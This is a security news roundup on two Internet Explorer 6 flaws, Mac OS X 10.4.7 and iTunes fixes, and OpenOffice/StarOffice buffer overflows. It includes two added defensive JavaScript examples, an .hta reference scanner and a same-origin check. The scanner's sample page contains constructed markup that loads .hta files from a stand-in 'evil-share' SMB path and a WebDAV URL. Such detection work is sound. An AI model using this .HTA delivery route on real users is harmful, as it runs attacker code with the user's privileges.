Two vulnerabilities in Internet Explorer 6 were reported last week, and proof-of-concept demonstrations of both have been published, yet Microsoft has not yet responded.
Apple has released updates for Mac OS X and iTunes to address security vulnerabilities. OpenOffice and StarOffice, the open-source and Sun-branded alternatives to Microsoft Office, have also been found to contain security flaws, and new versions have been released to fix them.
The two Internet Explorer vulnerabilities were announced last week. Both affect Internet Explorer 6 (IE), including on Windows XP SP2, and are not present in IE 7. One of the two issues, as first reported, also affected Firefox.
The first vulnerability, rated the more serious of the two, allows an HTML Application (.HTA file) to run even though such files can carry arbitrary, potentially dangerous code: an .HTA runs outside the browser's security zones with the privileges of the logged-on user. The user is tricked into double-clicking an icon on a web page, which causes an .HTA file that the attacker hosts on a share reachable over SMB or WebDAV to be executed on the user's system.
The second vulnerability lets a remote attacker read the content of another site's page loaded in the browser by accessing the object.documentElement.outerHTML property across domains, an information-disclosure issue. It is rated less severe than the first.
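Two checks follow as added examples; they are not code from the original article and not Microsoft's or IE's code. The first is the content-inspection rule a gateway or mail filter could run to flag pages that point the browser at an .HTA file hosted on an SMB share (a UNC path or file:// URL with a host part) or on an HTTP/WebDAV server, the delivery route described for the first vulnerability. It is a regex-based attribute scan, and the sample HTML, the location classes and all function names are the editor's own assumptions.

```javascript
// Added example: flag HTML that references an HTML Application (.hta) on a remote share
// or web server. An .hta runs outside the browser's security zones with the privileges of
// the logged-on user, so any reference to one from untrusted content deserves attention.
// This is a heuristic attribute scan (assumption), not a full HTML parser.

// Attributes through which IE can be pointed at a resource: src, data, href, codebase.
const ATTR_PATTERN = /\b(?:src|data|href|codebase)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

// Where does the reference point? SMB shares appear as UNC paths (\\server\share\...)
// or as file:// URLs with a host part; WebDAV is ordinary HTTP(S).
function classifyLocation(ref) {
  const r = ref.trim();
  if (/^\\\\[^\\\/]+[\\\/]/.test(r) || /^\/\/[^\\\/]+\//.test(r)) return 'smb-share'; // UNC path
  if (/^file:\/\/\//i.test(r)) return 'local-file';                                  // file:///C:/...
  if (/^file:\/\/[^\\\/]+\//i.test(r)) return 'smb-share';                            // file://server/share/...
  if (/^https?:\/\//i.test(r)) return 'http';                                         // WebDAV runs over HTTP(S)
  return 'relative';
}

// Strip any query string or fragment, then test the extension case-insensitively.
function isHtaReference(ref) {
  const path = ref.split(/[?#]/)[0].trim();
  return /\.hta$/i.test(path);
}

// Return every .hta reference found in the markup together with where it points.
function findHtaReferences(html) {
  const pattern = new RegExp(ATTR_PATTERN.source, 'gi'); // fresh regex state per call
  const hits = [];
  let m;
  while ((m = pattern.exec(html)) !== null) {
    const ref = m[1] !== undefined ? m[1] : (m[2] !== undefined ? m[2] : m[3]);
    if (isHtaReference(ref)) hits.push({ ref, location: classifyLocation(ref) });
  }
  return hits;
}

// True when the page would pull an .hta from an SMB share or an HTTP/WebDAV server.
function hasRemoteHta(html) {
  return findHtaReferences(html).some(h => h.location === 'smb-share' || h.location === 'http');
}

// Constructed sample page (not a real exploit), mirroring the article's description:
// the user is invited to double-click an icon backed by an .hta on a remote share.
const SAMPLE_HTML = `
<html><body>
<p>Double-click the icon below to open the report</p>
<object data="\\\\evil-share\\public\\report.hta" type="application/hta"></object>
<a href="http://dav.example.net/share/invoice.HTA?v=2">invoice</a>
<img src="https://cdn.example.com/logo.png">
<a href="docs/readme.html">readme</a>
<iframe src="file:///C:/temp/local.hta"></iframe>
</body></html>`;

for (const h of findHtaReferences(SAMPLE_HTML)) {
  console.log(h.location.padEnd(11), h.ref);
}
console.log('remote .hta present:', hasRemoteHta(SAMPLE_HTML)); // true
```

On the constructed page the scanner reports three .hta references: the UNC path as smb-share, the WebDAV URL as http, and the local file:/// path as local-file; only the first two count as the remote delivery route the article describes. The regex will not see references built at runtime by script, so the check is a first filter, not a guarantee.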
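The outerHTML issue is a failure of the browser's same-origin policy, which should stop script in one document from reading the DOM of a document served from a different scheme, host or port. As a second added example (not from the article and not IE's code), the following JavaScript implements that origin comparison and a guarded read of a document's outerHTML over a small in-memory model of two open documents; the model, the sample URLs and the function names are the editor's assumptions.

```javascript
// Added example: the same-origin comparison a browser must make before letting script in
// one document read another document's DOM, e.g. its documentElement.outerHTML.
// The IE 6 issue described above is a failure of exactly this check.
// The document model below is a stand-in for real browser windows (assumption).

// Two URLs share an origin when scheme, host and port all match. Default ports
// (80 for http, 443 for https) count as equal to an explicit port of the same value.
function originOf(urlString) {
  const u = new URL(urlString);                      // WHATWG URL parser (Node >= 10)
  const defaultPorts = { 'http:': '80', 'https:': '443', 'ftp:': '21' };
  const port = u.port || defaultPorts[u.protocol] || '';
  return `${u.protocol}//${u.hostname}:${port}`;     // hostname is already lower-cased
}

function sameOrigin(urlA, urlB) {
  return originOf(urlA) === originOf(urlB);
}

// A document as the browser sees it: its URL and its serialised markup.
function makeDocument(url, outerHTML) {
  return { url, outerHTML };
}

// Return target.outerHTML only if the requesting document shares its origin;
// otherwise throw, which is how a browser surfaces a cross-domain access attempt.
function readOuterHTML(requesterUrl, target) {
  if (!sameOrigin(requesterUrl, target.url)) {
    throw new Error(`Blocked: ${originOf(requesterUrl)} may not read ${originOf(target.url)}`);
  }
  return target.outerHTML;
}

// Convenience for callers that want a yes/no answer rather than an exception.
function canRead(requesterUrl, target) {
  try { readOuterHTML(requesterUrl, target); return true; } catch (e) { return false; }
}

// Constructed sample: a logged-in banking page and script running on an attacker's site.
const BANK_PAGE = makeDocument(
  'https://bank.example:443/account',
  '<html><body>Balance: 1234.56</body></html>'
);
const BANK_SCRIPT_URL = 'https://bank.example/help';
const ATTACKER_URL = 'http://evil.example/page.html';

console.log('bank script can read:', canRead(BANK_SCRIPT_URL, BANK_PAGE)); // true
console.log('attacker can read:   ', canRead(ATTACKER_URL, BANK_PAGE));    // false
```

The explicit :443 on the bank page and the implicit port on the bank's help page compare equal, while a scheme change (http vs https), a different subdomain, or a non-default port each yields a different origin and a blocked read, which is the behaviour the vulnerable IE 6 build failed to enforce for outerHTML.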
Last week Apple released Mac OS X 10.4.7 and iTunes 6.0.5. Both updates focus on security fixes.
The issues addressed in Mac OS X 10.4.7 include:
- A flaw in the AFP (Apple Filing Protocol) server in versions 10.4 to 10.4.6 allowed search results to include files and folders outside the area the user was permitted to search. This is an information disclosure: it reveals the names of files and folders the user is not authorised to see.
- ClamAV (the antivirus scanner) in Mac OS X Server versions 10.4 to 10.4.6 could execute arbitrary code because of a buffer overflow triggered during automatic signature updates. ClamAV has been updated to version 0.88.2 to fix this. If you have not yet installed the update, disable ClamAV's automatic update setting until you do.
- Viewing a crafted TIFF file through the ImageIO framework in Mac OS X and Mac OS X Server versions 10.4 to 10.4.6 could cause a crash or arbitrary code execution.
- A format string vulnerability in launchd in versions 10.4 to 10.4.6 allowed a local user to gain elevated (system) privileges.
- A malformed LDAP request could cause a denial of service in the OpenLDAP server of Mac OS X Server versions 10.4 to 10.4.6.
The iTunes 6.0.5 update is available for Mac OS X 10.2.8 and later and for Windows XP/2000 from Apple's website (www.apple.com).
OpenOffice and StarOffice are vulnerable to a buffer overflow that could let an attacker who gets a user to open a crafted document take control of the application, and so act with the privileges of the user running it.
OpenOffice.org 1.1.x and OpenOffice.org 2.0.x are affected. Sun has confirmed that StarOffice 6.0, StarOffice 7 and StarOffice 8 Office Suites are also vulnerable. New versions and patches have been released to fix the flaws.
Pham Van Linh
Email: [email protected]